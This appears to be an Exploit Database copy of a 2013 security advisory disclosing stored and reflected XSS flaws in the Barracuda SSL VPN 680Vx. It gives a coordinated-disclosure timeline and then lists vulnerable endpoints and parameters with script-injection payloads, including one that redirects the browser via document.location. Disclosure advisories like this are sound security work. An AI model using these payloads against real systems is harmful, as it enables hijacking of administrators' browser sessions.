Barracuda SSL VPN 680Vx 2.3.3.193 – Multiple Script Injection Vulnerabilities

• Exploit Database
• 8 阅读

• 作者： LiquidWorm
  日期： 2013-07-01
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/26527/

• 
  Barracuda SSL VPN 680Vx 2.3.3.193 Multiple Script Injection Vulnerabilities
  
  
  Vendor: Barracuda Networks, Inc.
  Product web page: https://www.barracuda.com
  Affected version: 2.3.3.193, Model: V680
  
  Summary: The Barracuda SSL VPN is a powerful plug-and-play appliance
  purpose-built to provide remote users with secure access to internal
  network resources.
  
  Desc: Barracuda SSL VPN suffers from multiple stored XSS vulnerabilities
  when parsing user input to several parameters via POST method. Attackers
  can exploit these weaknesses to execute arbitrary HTML and script code in
  a user's browser session.
  
  Tested on: Linux 2.4.x, Jetty Web Server
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Vendor status:
  
  [05.03.2013] Vulnerabilities discovered.
  [16.03.2013] Contact with the vendor.
  [17.03.2013] Vendor replies.
  [19.03.2013] Working with the vendor.
  [28.03.2013] Vendor confirms issues, track BNSEC-1239.
  [15.04.2013] Asked vendor for status update.
  [17.04.2013] Vendor replies.
  [18.04.2013] Confirming that the issues are still present on the demo test sites. (v2.3.3.193)
  [07.05.2013] Vendor informs that the version 2.3.3.216 since 13.03.2013 is patched from these issues.
  [08.05.2013] Coordinating with the vendor.
  [08.06.2013] Vendor confirms that as of firmware version 2.3.3.216 the issues have been resolved.
  [01.07.2013] Coordinated public security advisory released.
  
  
  
  Advisory ID: ZSL-2013-5147
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5147.php
  
  Barracuda Labs: http://barracudalabs.com/?page_id=3456
  http://barracudalabs.com/?page_id=3458
  
  
  05.03.2013
  
  --
  
  ====================================================================================
  
  
  https://server/showSystemConfiguration.do?categoryId=821
  
  CRLs ADD: "><script>alert(1);</script>
  
  Parameter: propertyItem[25].value
  
  ====================================================================================
  
  
  https://server/showAuditReports.do (Reports)
  
  Username ADD: "><script>alert(1);</script>
  
  Parameters: user
  account
  
  ====================================================================================
  
  
  https://server/showSystemConfiguration.do?categoryId=14800
  
  Files to Scan ADD: "><script>alert(1);</script>
  Files to Exclude from Scanning ADD: "><script>alert(2);</script>
  Files to Block ADD: "><script>alert(3);</script>
  
  Parameters: propertyItem[1].value
  propertyItem[2].value
  propertyItem[3].value
  
  ====================================================================================
  
  
  https://server/showSystemConfiguration.do?categoryId=810
  
  Public Internal Web Sites ADD: "><script>alert(1);</script>
  VPN Port ADD: "><script>alert(2);</script>
  
  Parameters: propertyItem[1].value
  propertyItem[8].value
  
  ====================================================================================
  
  
  https://server/showAvailableAccounts.do
  
  Available Groups ADD: "><script>alert(1);</script>
  
  Parameter: selectedRoles
  
  ====================================================================================
  
  
  https://server/editMessage.do?actionTarget=sendMessageToUser&resourceName=user&realm=1&parent_name=edit
  
  Account ADD: "><script>alert(1);</script>
  Group ADD: "><script>alert(2);</script>
  Policy ADD: "><script>alert(3);</script>
  
  Parameter: policy
  
  ====================================================================================
  
  
  https://server/editAccount.do?actionTarget=edit&username=guest&parent_name=edit
  
  Available Groups ADD: "><script>alert(1);</script>
  Authorized IP Addresses ADD: "><script>alert(2);</script>
  Other Computers (Waks-On-LAN) ADD: "><script>alert(3);</script>
  
  Parameters: selectedRoles
  propertyItem[1].value
  propertyItem[6].value
  
  ====================================================================================
  
  
  https://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=%22onmouseover=prompt%28%22XSS3%22%29%3E%0A%0DB&realm=9999&parent_name=edit
  https://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=CLICK%20ME%20PLEASE%20!!!%20ZOMG%20XSS%20INVISIBLE%20%22onmouseover=prompt%28document.location=%27http://zeroscience.mk%27%29%3E&realm=9999&parent_name=edit
  
  Group ADD: "><script>alert(1);</script>
  
  Parameter: resourceName
  
  ====================================================================================